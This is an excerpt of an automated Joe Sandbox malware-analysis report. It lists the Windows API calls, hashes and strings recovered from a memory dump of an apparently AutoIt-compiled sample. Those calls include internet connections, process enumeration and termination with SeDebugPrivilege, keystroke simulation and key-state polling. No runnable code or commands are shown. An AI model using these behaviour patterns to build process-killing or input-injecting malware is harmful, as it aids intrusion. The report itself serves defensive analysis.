                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1296646539-0
                                                                                                                                                                                                                                                                              • Opcode ID: 2bec96b21cb091db9f494cbdd8e411b205b25245a83c982ca065de67c26c520d
                                                                                                                                                                                                                                                                              • Instruction ID: 3f77186e1af969603ecfc192e8875c33d5402ff1655efb39457c6663e1d0420d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2bec96b21cb091db9f494cbdd8e411b205b25245a83c982ca065de67c26c520d
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AC1497990464AEBDB10CFA8C940BFEB7B2FF08310F14841AE995E7250DB38A951DB64
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 1282221369-0
                                                                                                                                                                                                                                                                              • Opcode ID: 41921c6d10ff66830dd1d91cab77e1724d891f54d2800adb3de78b1be7d8bdff
                                                                                                                                                                                                                                                                              • Instruction ID: 537925bb6869b7959dd397dd9fa4c423dd3353085ce433fa375b68c5d675f6f1
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 41921c6d10ff66830dd1d91cab77e1724d891f54d2800adb3de78b1be7d8bdff
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E061F671A04330EFDB31AF74F885AA97BE4AF02320F54416DE945A7283E63DDD418B95
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CBC7
                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 0076CBDA
                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 0076CBEE
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0076CCB7
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: GetLastError.KERNEL32 ref: 0076CD67
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: SetEvent.KERNEL32(?), ref: 0076CD7B
                                                                                                                                                                                                                                                                                • Part of subcall function 0076CC98: InternetCloseHandle.WININET(00000000), ref: 0076CD86
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 337547030-0
                                                                                                                                                                                                                                                                              • Opcode ID: 90afb1aeb1d493b83fabe6863910a7790812a8e40f6edcec779845ddf9a983d9
                                                                                                                                                                                                                                                                              • Instruction ID: 0b51cef82f1e6dbe6f6d11b777d8fe61cfed06a0bf80df5cfa0fb1c172376eb3
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90afb1aeb1d493b83fabe6863910a7790812a8e40f6edcec779845ddf9a983d9
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8A317A71601705AFDB229FB5DD48A7ABBF8FF04310B14852DF89B92610D739EC14ABA0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007543AD
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetCurrentThreadId.KERNEL32 ref: 007543B4
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752F00), ref: 007543BB
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752F0A
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00752F28
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00752F2C
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752F36
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00752F4E
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00752F52
                                                                                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00752F5C
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00752F70
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00752F74
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
• GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00751D95,?,?,00000000), ref: 00752159
• HeapAlloc.KERNEL32(00000000,?,00751D95,?,?,00000000), ref: 00752160
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751D95,?,?,00000000), ref: 00752175
• GetCurrentProcess.KERNEL32(?,00000000,?,00751D95,?,?,00000000), ref: 0075217D
• DuplicateHandle.KERNEL32(00000000,?,00751D95,?,?,00000000), ref: 00752180
• GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00751D95,?,?,00000000), ref: 00752190
• GetCurrentProcess.KERNEL32(00751D95,00000000,?,00751D95,?,?,00000000), ref: 00752198
• DuplicateHandle.KERNEL32(00000000,?,00751D95,?,?,00000000), ref: 0075219B
• CreateThread.KERNEL32(00000000,00000000,007521C1,00000000,00000000,00000000), ref: 007521B5
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
• Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
Similarity
• API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
• String ID:
• API String ID: 1957940570-0
APIs
  • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075CF99
• _wcslen.LIBCMT ref: 0075CFE0
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0075D047
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0075D075
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
Similarity
• API ID: ItemMenu$Info_wcslen$Default
• String ID: ,*|$0$<*|
• API String ID: 1227352736-3361180636
APIs
  • Part of subcall function 0075DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 0075DDAC
  • Part of subcall function 0075DD87: Process32FirstW.KERNEL32(00000000,?), ref: 0075DDBA
  • Part of subcall function 0075DD87: CloseHandle.KERNEL32(00000000), ref: 0075DE87
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077ABCA
• GetLastError.KERNEL32 ref: 0077ABDD
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0077AC10
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0077ACC5
• GetLastError.KERNEL32(00000000), ref: 0077ACD0
• CloseHandle.KERNEL32(00000000), ref: 0077AD21
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007843C1
• SendMessageW.USER32(00000000,00001036,00000000,?), ref: 007843D6
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007843F0
• _wcslen.LIBCMT ref: 00784435
• SendMessageW.USER32(?,00001057,00000000,?), ref: 00784462
• SendMessageW.USER32(?,00001061,?,0000000F), ref: 00784490
Strings
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                                                                                                                              • API String ID: 2147712094-78025650
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0075C6C4
                                                                                                                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 0075C6E4
                                                                                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0075C71A
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(00D00380), ref: 0075C76B
                                                                                                                                                                                                                                                                              • InsertMenuItemW.USER32(00D00380,?,00000001,00000030), ref: 0075C793
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                              • String ID: 0$2
                                                                                                                                                                                                                                                                              • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 006F19E1
                                                                                                                                                                                                                                                                              • ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                                                                                                                                                                                                                                                              • GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                              • String ID: $'o$$'o
                                                                                                                                                                                                                                                                              • API String ID: 4210589936-2961772314
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00788740
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00788765
                                                                                                                                                                                                                                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0078877D
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 007887A6
                                                                                                                                                                                                                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0076C1F2,00000000), ref: 007887C6
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000004), ref: 007887B1
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 2294984445-3772712737
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 0075D1BE
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: IconLoad
                                                                                                                                                                                                                                                                              • String ID: blank$info$question$stop$warning
                                                                                                                                                                                                                                                                              • API String ID: 2457776203-404129466
                                                                                                                                                                                                                                                                              • Opcode ID: ae4d33dbcc92e040c387b852462b6337d408f4dc89cf5fcaf26100a2415983ac
                                                                                                                                                                                                                                                                              • Instruction ID: b0b73b84d8c1adccc0355d7a0b32f09fea8ff8ed5f6c07a1d3406cde049c3d10
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ae4d33dbcc92e040c387b852462b6337d408f4dc89cf5fcaf26100a2415983ac
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A11EB3134870AFBE7355A14EC82DEA779CDF09761B210029FD00A62C1DBFC5E448264
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                                                                                                                              • String ID: 0.0.0.0
                                                                                                                                                                                                                                                                              • API String ID: 642191829-3771769585
                                                                                                                                                                                                                                                                              • Opcode ID: 5c779495dd7bcd932da5703de138231a3aa84f9eca38df94060c0807decffd74
                                                                                                                                                                                                                                                                              • Instruction ID: dff7f124cff51ebd43d0d597eb1a359771de512fa68b2b7560aa7378d14e2a48
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c779495dd7bcd932da5703de138231a3aa84f9eca38df94060c0807decffd74
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D411D271900118BBDB246B649C4EEEA77ACDF05711F1000A9F915A60D1EEBC9F859B60
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$LocalTime
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 952045576-0
                                                                                                                                                                                                                                                                              • Opcode ID: 19d6f5c1331efe6ac0323aa3785d11a2702887ecefc9b5b276fe27925ae06d9b
                                                                                                                                                                                                                                                                              • Instruction ID: 4b0ada1ce4bdfbe98159777be5e0f5e804c45dff7697428f0180c8c994c42068
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19d6f5c1331efe6ac0323aa3785d11a2702887ecefc9b5b276fe27925ae06d9b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8941A365C11114F5CB11EBB8CC8AACFB7B8AF05351F508862E508E31A1FA78D695C7E6
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 007837B7
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 007837BF
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007837CA
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 007837D6
                                                                                                                                                                                                                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00783812
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00783823
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00786504,?,?,000000FF,00000000,?,000000FF,?), ref: 0078385E
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 0078387D
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 3864802216-0
                                                                                                                                                                                                                                                                              • Opcode ID: 1a86376ea4278776c867a2402f352ade540641c5c3943fb12205a4be0270dd65
                                                                                                                                                                                                                                                                              • Instruction ID: 39e4dc944b6969e890b3b40544464e64d445c90551a916a1228f92fccf523467
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1a86376ea4278776c867a2402f352ade540641c5c3943fb12205a4be0270dd65
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8331BF72240214BFEB218F54CC89FEB3BA9EF09721F044025FE089A1D1D6B99C41C7A4
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 0073194E
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 007319D1
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00731B7B,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00731A64
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00731A7B
                                                                                                                                                                                                                                                                                • Part of subcall function 00723B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00716A79,?,0000015D,?,?,?,?,007185B0,000000FF,00000000,?,?), ref: 00723BC5
                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00731B7B,00000000,00000000,?,00000000,?,?,?,?), ref: 00731AF7
                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00731B22
                                                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00731B2E
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2829977744-0
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                              • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                                                                                                                                                              • API String ID: 2610073882-625585964
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 007743C8
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?), ref: 007744D7
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007744E7
                                                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0077467C
                                                                                                                                                                                                                                                                                • Part of subcall function 0076169E: VariantInit.OLEAUT32(00000000), ref: 007616DE
                                                                                                                                                                                                                                                                                • Part of subcall function 0076169E: VariantCopy.OLEAUT32(?,?), ref: 007616E7
                                                                                                                                                                                                                                                                                • Part of subcall function 0076169E: VariantClear.OLEAUT32(?), ref: 007616F3
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                                                                                                                                                                                              • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                                                                                                                                              • API String ID: 4137639002-1221869570
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?,?,00750C4E), ref: 0075091B
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750936
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?,?), ref: 00750944
                                                                                                                                                                                                                                                                                • Part of subcall function 007508FE: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00750831,80070057,?), ref: 00750954
                                                                                                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 007756AE
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 007757B6
                                                                                                                                                                                                                                                                              • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0077582C
                                                                                                                                                                                                                                                                              • CoTaskMemFree.OLE32(?), ref: 00775837
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                                                                                                                                                                                              • String ID: NULL Pointer assignment
                                                                                                                                                                                                                                                                              • API String ID: 614568839-2785691316
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetMenu.USER32(?), ref: 00782C1F
                                                                                                                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 00782C51
                                                                                                                                                                                                                                                                              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00782C79
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00782CAF
                                                                                                                                                                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 00782CE9
                                                                                                                                                                                                                                                                              • GetSubMenu.USER32(?,?), ref: 00782CF7
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007543AD
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: GetCurrentThreadId.KERNEL32 ref: 007543B4
                                                                                                                                                                                                                                                                                • Part of subcall function 00754393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00752F00), ref: 007543BB
                                                                                                                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00782D7F
                                                                                                                                                                                                                                                                                • Part of subcall function 0075F292: Sleep.KERNEL32 ref: 0075F30A
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
